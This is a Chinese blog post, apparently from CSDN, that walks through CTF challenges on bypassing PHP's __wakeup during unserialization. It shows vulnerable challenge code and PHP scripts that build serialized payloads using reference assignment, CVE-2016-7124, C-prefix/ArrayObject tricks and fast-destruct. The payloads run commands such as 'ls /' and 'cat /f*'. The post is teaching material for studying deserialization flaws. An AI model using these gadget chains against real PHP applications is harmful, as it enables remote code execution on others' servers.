反序列化中_wakeup的绕过

已于 2024-01-05 00:25:16 修改
阅读量1.6k 收藏 13
点赞数
分类专栏: 反序列化 文章标签: web安全 php
于 2023-09-05 23:32:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/132513838
版权

文章目录

前言

反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。

绕过方法

变量引用

两个变量同时指向同一个内存地址

例题:[UUCTF 2022 新生赛]ez_unser
源代码

<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确!!!搞什么!!");
}
$bbb=unserialize($_GET['a']);

分析一下,有eval函数可以命令执行,但是__wakeup()会让a的值为空。
同时正则匹配不让我们修改属性个数绕过__wakeup(),这就是个难题

可利用点为$this->b=$this->c;,所以我们可以引用赋值绕过__wakeup()
payload

<?php
class test{
    public $a;
    public $b;
    public $c;  
}
$t=new test();
$t->c="system('ls /');";
$t->b=&$t->a;
echo serialize($t);
?>

注:$t->b=&$t->a;意味着它们引用相同的内存地址,它们指向相同的值

属性个数不匹配(cve-2016-7124)

影响范围:

  • PHP5 < 5.6.25

  • PHP7 < 7.0.10

正常来说在反序列化过程中,会先调用wakeup()方法再进行unserilize(),但如果序列化字符串中表示对象属性个数的值大于真实的属性个数时,wakeup()的执行会被跳过。

例题:攻防世界 unserialize3
源代码

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

分析一下,如果我们反序列化的话就会调用__wakeup()
然后就触发exit('bad requests');,我们只需要属性个数加一即可绕过
payload

<?php
class xctf{
    public $flag = '111';
    public function __wakeup(){
        exit('bad requests');
    }
}
$a=new xctf();
echo serialize($a);
//O:4:"xctf":1:{s:4:"flag";s:3:"111";}
修改成下面
//O:4:"xctf":2:{s:4:"flag";s:3:"111";}
?>

C绕过

O标识符代表对象类型,而C标识符代表类名类型。如果将O替换为C,则在反序列化时会将其解释为一个新的类名字符串,从而创建一个新的类而不是对象。因为这个新的类没有被序列化过,所以它没有任何属性或方法。这样一来,在反序列化时,__wakeup魔术方法就不会被自动调用。

常规绕过

O:4:“User”:2:{s:3:“age”;i:20;s:4:“name”;s:4:“daye”;}
变成下面
C:4:“User”:2:{}

C进阶绕过
例题:愚人杯3rd [easy_php]

 <?php
error_reporting(0);
highlight_file(__FILE__);

class ctfshow{
    public function __wakeup(){
        die("not allowed!");
    }
    public function __destruct(){
        system($this->ctfshow);
    }
}
$data = $_GET['1+1>2'];

if(!preg_match("/^[Oa]:[\d]+/i", $data)){
    unserialize($data);
}
?>

分析一下,核心是绕过_wakeup

<?php
class ctfshow{

    public function __wakeup(){
        die("not allowed!");
    }

    public function __destruct(){
        system($this->ctfshow);
    }

} 
$a=new ctfshow();
echo serialize($a);
//O:7:"ctfshow":0:{}

我们直接改成C试试,发现根本没有命令执行的步骤
payload

 <?php
     
class ctfshow{
	public $ctfshow="cat /f*";
}
$A=new ArrayObject;
$A->a=new ctfshow;
echo serialize($A);
?>

然后再编码一下,就可以得到flag
在这里插入图片描述或者是用SplStack()也行

 <?php
class ctfshow{
	public $ctfshow="cat /f*";
}
$a=new ctfshow;
$A=new SplStack();
$A->push($a);
echo serialize($A);
?>

fast-destruct

本质上就是利用GC回收机制。
给个exp [NewStarCTF 2023 week4] More Fast

<?php
class Start{
    public $errMsg;
}

class Pwn{
    public $obj;
}

class Reverse{
    public $func;
}

class Web{
    public $func;
    public $var;
}

class Crypto{
    public $obj;
}

class Misc{

}

$a=new Start();
$b=new Crypto();
$c=new Reverse();
$d=new Pwn();
$e=new Web();
$a->errMsg=$b;
$b->obj=$c;
$c->func=$d;
$d->obj=$e;
$e->func='system';
$e->var="cat /f*";
$A=array($a,NULL);
echo serialize($A);

关键就是最后的步骤才能生成下面正常payload

方法有两种,删除末尾的花括号、数组对象占用指针(改数字)

//正常payload:
a:2:{i:0;O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:7:"cat /f*";}}}}}i:1;N;}

//删除末尾花括号payload:
a:2:{i:0;O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:7:"cat /f*";}}}}}i:1;N;

//数组对象占用指针payload(加粗部分数组下标和前面重复都是0,导致指针出问题)
a:2:{i:0;O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:7:"cat /f*";}}}}}i:0;N;}

其余GC回收机制

属性值的长度不匹配

具体形式

//正常payload
O:1:“A”:2:{s:4:“info”;O:1:“B”:1:{s:3:“end”;N;}s:4:“Aend”;s:1:“1”;}
//外部类属性值长度异常payload:
//先外类__destruct()后内类__wakeup()
O:1:“A”:2:{s:4:“info”;O:1:“B”:1:{s:3:“end”;N;}s:4:“Aend”;s:2:“1”;}
O:1:“A”:2:{s:4:“info”;O:1:“B”:1:{s:3:“end”;N;}s:4:“Aend”;s:1:“12”;}
_rev1ve
关注
  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[极客大挑战 2019]PHP (简单的php反序列化和__wakeup绕过
xlcvv的博客
04-05 890
这群师傅,不仅懂得D站,html也写的很棒,超喜欢这里的,人长的又帅,说话又好听······ 进入正题,提示备份了网站,那就是WWW.zip了,下载下来: 浏览了一遍,主要在class.php里面: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; ...
PHP-Wakeup魔术漏洞骚操作
HBohan的博客
12-12 1339
起因 前两天在攻防世界做题的时候,看到了一个Wakeup绕过的典型案例。正好拿来写一篇随笔记录。 案例 进入后,我们得到题目代码,我们现在需要读一下这个代码。 先对代码进行一个审计 __wakeup()很容易绕过,只需要令序列化字符串标识变量数量的值大于实 际变量即可绕过__wakeup()函数 _wakeup()的绕过,大概应该是PHP5<5.6.25,PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化object的个数和之前的个数不等时,wakeup就会被绕过。 (
__wakeup()绕过
v2ish1yan的博客
04-23 6596
__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数 如xctf-unserialize3 只要序列化的的成员数大于实际成员数,即可绕过 如 <?php class xctf { public $flag = '111'; public function __wakeup() { exit('bad requests'); } } $a=new xctf(); var_dump(seri
[UUCTF 2022 新生赛]ez_unser
最新发布
wangzhemvp的博客
05-12 211
正常序列化出来是O:4:"test":3:{s:1:"a";preg_match('/test":3/i',$a)) 序列化里面要有 "test":3 ,但又要绕过__wakeup(),这显然冲突了。把a的地址给到b,然后在把正确的内容给到c,因为$this->b=$this->c。改不了变量属性,$a肯定会被' '覆盖,那怎么办呢?
绕过__wakeup() 反序列化 合集
Jay17的博客
08-24 1337
绕过__wakeup() 反序列化 合集
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3628
_wakeup()是 PHP 一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用,它通常不需要参数。
反序列化漏洞详解(三)
m0_72125469的博客
12-03 233
wakeup绕过(不怎么重要,但需要知道)反序列化漏洞:CVE-2016-7124 就是这个原因漏洞产生原因:如果存在__wakeup方法,调用unserilize()方法前泽贤调用wakeup方法,但是序列化字符串表示对象属性个数的值大于真实的属性个数时,会跳过__wakeup()的执行直接实战这里其实我有两个问题第一个问题 __wakeup不是在反序列化之前执行的嘛 他赋值不应该是没用嘛 他执行结束后对象获取的不是序列化字符串的值嘛?难道__wakeup会一直检查?解决:总结起来,
NSS [UUCTF 2022 新生赛]ez_unser
Jay17的博客
07-04 754
NSS [UUCTF 2022 新生赛]ez_unser
序列化一个类_php的类的序列化脚本_
09-30
- `__wakeup()`:在反序列化后被调用,通常用于重新初始化对象的状态,尤其是那些不能序列化的属性或资源。 ```php class MyClass { private $var1; private $resource; // 假设这是一个不能序列化的资源 ...
PHP的序列化和反序列化
09-18
此外,对于对象的序列化,PHP会在反序列化时调用对象的`__wakeup()`魔术方法,以便对象可以恢复其可能在序列化过程丢失的状态,如重新建立数据库连接等。 总结来说,PHP的序列化和反序列化是数据持久化和交换的...
wakeup_asm.rar_startup_wakeup
09-19
标题的“wakeup_asm.rar_startup_wakeup”暗示了这是一个关于计算机操作系统启动唤醒功能的源代码压缩包,特别是涉及到ACPI(Advanced Configuration and Power Interface)协议的实现。在ACPI规范,启动唤醒...
WakeUP_Poweroff.rar_WakeUP_Poweroff_delphi_delphi 托盘_网络唤醒
09-19
以上内容是根据“WakeUP_Poweroff.rar”压缩包的资源,特别是“WakeUP_Poweroff”项目,对网络唤醒和Delphi编程实践的深入解析。对于希望学习网络唤醒技术,以及使用Delphi进行系统级编程的开发者来说,这些都是...
详解php反序列化
12-17
恶意用户可能会构造特殊的序列化字符串,当这些字符串被反序列化时,可以触发对象的魔术方法(如`__wakeup()`),从而执行非预期的代码或者改变程序状态。魔术方法在特定情况下会被自动调用,比如对象创建、序列化与...
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 471
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
2022 UUCTF Web
weixin_63231007的博客
12-19 2246
2022UUCTF web部分赛题分析
PHP反序列化如何绕过_wakeup()函数的一些技巧
m0_63138919的博客
08-28 1209
本文为魔术方法_wakeup()的一些绕过用法
[SWPUCTF 2022 新生赛]ez_ez_unserialize
2301_80553405的博客
02-12 617
创造类x,定义了一个魔术常量x为_FILE_,有定义了几个函数,construct函数让x类的常量x赋值,wakeup让x重新赋值为_FULE_,destruct函数高亮x常量,如果传参x存在反序列化,否则输出。修改为O:1:"X":2:{s:1:"x";看到提示flag在fllllllag.php,将代码复制,删掉没有的,加上x序列化。由于要绕过wakeup函数,只要序列化的的成员数大于实际成员数,即可绕过。打开后是段php代码。
反序列化__wakeup()绕过
csjjjd的博客
01-24 599
这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
[UUCTF 2022]ez_user
ShangYaoPaiGu的博客
12-07 266
进入环境,获得源码: 审计源码,为php反序列化这里首先想到的是利用CVE-2016-7124,后面发现不成功,看了下题目的环境:题目为,而该漏洞利用的条件是那只能换一种思路。题目php函数的触发顺序为: 变量在wakeup被置空了,所以在想要执行提前构造好的a,只能利用 这条语句,也就是将和“链接”起来: 这样在被设置为空字符串之后,通过重新赋予我们构造好的命令进行执行。构造代码如下: 传入参数a= 得到: flag文件为fffffffffflagafag所以最终exp为: payload:
autosar U8 IGNITION_WAKEUP:1;
04-26
在AUTOSAR,U8 IGNITION_WAKEUP:1是一个位字段,表示一个8位的无符号整数类型的变量,其只有最低位(bit 0)用于表示IGNITION_WAKEUP。这个位字段可以用来表示车辆的点火唤醒信号。 位字段是一种在编程用于节省内存空间的技术。它允许将多个逻辑上相关的布尔值或状态位打包到一个整数类型的变量,从而减少内存的使用。 在这个例子,U8表示一个8位的无符号整数类型,IGNITION_WAKEUP是位字段的名称,后面的":1"表示该位字段只占用1个bit。 相关问题: 1. 什么是位字段? 2. AUTOSAR还有其他常用的位字段吗? 3. 如何在C或C++定义和使用位字段?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值